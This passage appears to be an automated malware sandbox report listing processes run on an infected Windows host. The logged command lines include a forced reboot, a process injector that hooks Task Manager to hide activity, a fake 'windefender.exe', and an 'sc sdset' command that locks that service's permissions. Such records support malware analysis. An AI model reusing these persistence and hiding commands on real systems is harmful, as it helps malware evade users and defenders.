                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: mountvol.exe PID: 1312 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:09
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /d
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 4632 Parent PID: 1312

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: svchost.exe PID: 3544 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: mountvol.exe PID: 60 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /s
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 5168 Parent PID: 60

                                                                                                  General

                                                                                                  Start time:13:13:16
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: mountvol.exe PID: 2056 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:18
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /d
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 6280 Parent PID: 2056

                                                                                                  General

                                                                                                  Start time:13:13:19
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: shutdown.exe PID: 6772 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:21
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\shutdown.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:shutdown -r -t 5
                                                                                                  Imagebase:0xe40000
                                                                                                  File size:23552 bytes
                                                                                                  MD5 hash:E2EB9CC0FE26E28406FB6F82F8E81B26
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 6016 Parent PID: 6772

                                                                                                  General

                                                                                                  Start time:13:13:21
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: svchost.exe PID: 6476 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:13:26
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: injector.exe PID: 6592 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                                                  Imagebase:0x7ff7019b0000
                                                                                                  File size:288256 bytes
                                                                                                  MD5 hash:D98E33B66343E7C96158444127A117F6
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 14%, Metadefender, Browse
                                                                                                  • Detection: 73%, ReversingLabs

                                                                                                  Analysis Process: windefender.exe PID: 4940 Parent PID: 464

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\windefender.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\windefender.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2102272 bytes
                                                                                                  MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 29%, Metadefender, Browse
                                                                                                  • Detection: 79%, ReversingLabs

                                                                                                  Analysis Process: conhost.exe PID: 4640 Parent PID: 6592

                                                                                                  General

                                                                                                  Start time:13:13:33
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: conhost.exe PID: 1460 Parent PID: 4940

                                                                                                  General

                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: cmd.exe PID: 4072 Parent PID: 4940

                                                                                                  General

                                                                                                  Start time:13:13:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                  Imagebase:0xd80000
                                                                                                  File size:232960 bytes
                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: sc.exe PID: 5332 Parent PID: 4072

                                                                                                  General

                                                                                                  Start time:13:13:35
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\sc.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                                                                                                  Imagebase:0xca0000
                                                                                                  File size:60928 bytes
                                                                                                  MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Analysis Process: windefender.exe PID: 6348 Parent PID: 572

                                                                                                  General

                                                                                                  Start time:13:13:36
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\windefender.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\windefender.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2102272 bytes
                                                                                                  MD5 hash:E0A50C60A85BFBB9ECF45BFF0239AAA3
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  Disassembly

                                                                                                  Code Analysis

                                                                                                  Reset < >